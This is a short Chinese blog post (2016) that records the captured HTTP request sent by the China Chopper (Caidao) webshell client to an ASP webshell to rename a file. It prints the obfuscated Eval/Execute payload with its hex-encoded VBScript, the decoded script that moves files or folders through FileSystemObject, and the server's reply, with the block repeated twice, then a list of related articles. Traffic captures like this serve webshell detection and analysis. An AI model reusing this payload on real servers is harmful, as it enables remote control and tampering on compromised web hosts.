菜刀ASP 文件重命名抓包
2016-05-09 19:59
459 查看
http://blog.csdn.net/webxscan 神龙
文件重命名
webxscan=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""53463D5265717565737428227A3122293A44463D5265717565737428227A3222293A5365742046733D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A49662046732E466F6C64657245786973747328534629205468656E3A46732E4D6F7665466F6C6465722053462C44463A456C73653A46732E4D6F766546696C652053462C44463A456E642049663A5365742046733D4E6F7468696E673A496620457272205468656E3A53493D224552524F523A2F2F2022264572722E4465736372697074696F6E3A456C73653A53493D2231223A456E642049663A526573706F6E73652E577269746528534929"""")):Response.Write(""""|<-""""):Response.End"")")&z1=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5C123.txt&z2=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5CASP.txt
&z1=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5C123.txt
&z2=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5CASP.txt
SF=Request("z1")
DF=Request("z2")
Set Fs=CreateObject("Scripting.FileSystemObject")
If Fs.FolderExists(SF) Then
Fs.MoveFolder SF,DF
Else
Fs.MoveFile SF,DF
End If
Set Fs=Nothing
If Err Then
SI="ERROR:// "&Err.Description
Else
SI="1"
End If
Response.Write(SI)
->|1|<-
文件重命名
webxscan=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""53463D5265717565737428227A3122293A44463D5265717565737428227A3222293A5365742046733D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A49662046732E466F6C64657245786973747328534629205468656E3A46732E4D6F7665466F6C6465722053462C44463A456C73653A46732E4D6F766546696C652053462C44463A456E642049663A5365742046733D4E6F7468696E673A496620457272205468656E3A53493D224552524F523A2F2F2022264572722E4465736372697074696F6E3A456C73653A53493D2231223A456E642049663A526573706F6E73652E577269746528534929"""")):Response.Write(""""|<-""""):Response.End"")")&z1=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5C123.txt&z2=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5CASP.txt
&z1=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5C123.txt
&z2=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5CASP.txt
SF=Request("z1")
DF=Request("z2")
Set Fs=CreateObject("Scripting.FileSystemObject")
If Fs.FolderExists(SF) Then
Fs.MoveFolder SF,DF
Else
Fs.MoveFile SF,DF
End If
Set Fs=Nothing
If Err Then
SI="ERROR:// "&Err.Description
Else
SI="1"
End If
Response.Write(SI)
->|1|<-
相关文章推荐
- 菜刀ASP 删除文件抓包
- ASP.NET MVC 利用Razor引擎生成静态页
- ASP.NET MVC路由扩展:路由映射
- ASP.NET的路由系统:路由映射
- ASP.NET的路由系统:根据路由规则生成URL
- ASP.NET的路由系统:URL与物理文件的分离
- ASP.NET 2.0 - 导航Web.config配置
- Aspose.Words生成报告
- Asp.net访问本地JSON提示不允许访问解决方案
- 在ASP.NET 2.0中操作数据之三十四:基于DataList和Repeater跨页面的主/从报表
- ASP.NET页面中去除VIEWSTATE视
- ASP.NET获取IP的6种方法 ( 转)
- 转发 win7+iis7.5+asp.net下 CS0016: 未能写入输出文件“c:\Windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files 解决方案
- 使用ASP.Net WebAPI构建REST服务(一)——简单的示例
- 在ASP.NET 2.0中操作数据之三十三:基于DataList和Repeater使用DropDownList过滤的主/从报表
- 在ASP.NET 2.0中操作数据之三十二:数据控件的嵌套
- 在ASP.NET 2.0中操作数据之三十一:使用DataList来一行显示多条记录
- ASP.NET Web API 简介
- 在ASP.NET 2.0中操作数据之三十:格式化DataList和Repeater的数据
- ASP.NET C# 有程序集加不了解决办法